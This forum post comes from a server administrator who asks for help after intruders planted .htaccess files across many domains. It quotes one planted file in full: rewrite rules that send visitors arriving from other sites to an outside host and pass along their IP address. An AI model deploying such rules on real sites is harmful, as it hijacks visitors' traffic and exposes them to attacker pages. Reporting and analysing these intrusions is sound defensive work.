Hey guys! I'm currently experimenting the same problem... A shameless folk / group of shameless folks are playing with our server... They are creating .htaccess files in the writeable directories, even if they have set the permissions as: 0774. (so everybody can write -Owner, Group- except the Others).  Because the issue affects a lot, lot of domains, it would be very urgent to solve this out...
The .htaccess file looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

Thx for any help!